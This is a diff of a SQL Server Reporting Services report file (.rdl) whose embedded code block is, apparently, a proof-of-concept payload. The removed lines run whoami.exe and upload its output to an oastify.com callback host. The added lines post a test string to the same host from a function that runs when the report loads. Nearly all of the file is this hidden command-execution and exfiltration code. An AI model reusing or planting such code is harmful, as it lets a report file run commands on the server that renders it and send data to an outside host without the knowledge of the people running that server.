--- a/untitled.rdl
+++ b/untitled.rdl
@@ -44,9 +44,13 @@
     </GridLayoutDefinition>
   </ReportParametersLayout>
   <Code>
-    Dim p As System.Diagnostics.Process = System.Diagnostics.Process.Start("whoami.exe")
-    Dim webClient As New System.Net.WebClient
-    Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", p.StandardOutput.ReadToEnd())
+    Public Function F() As String
+      Dim webClient As New System.Net.WebClient
+      Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Abc 123")
+      Return ""
+    End Function
+
+    Dim x As String = F()
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
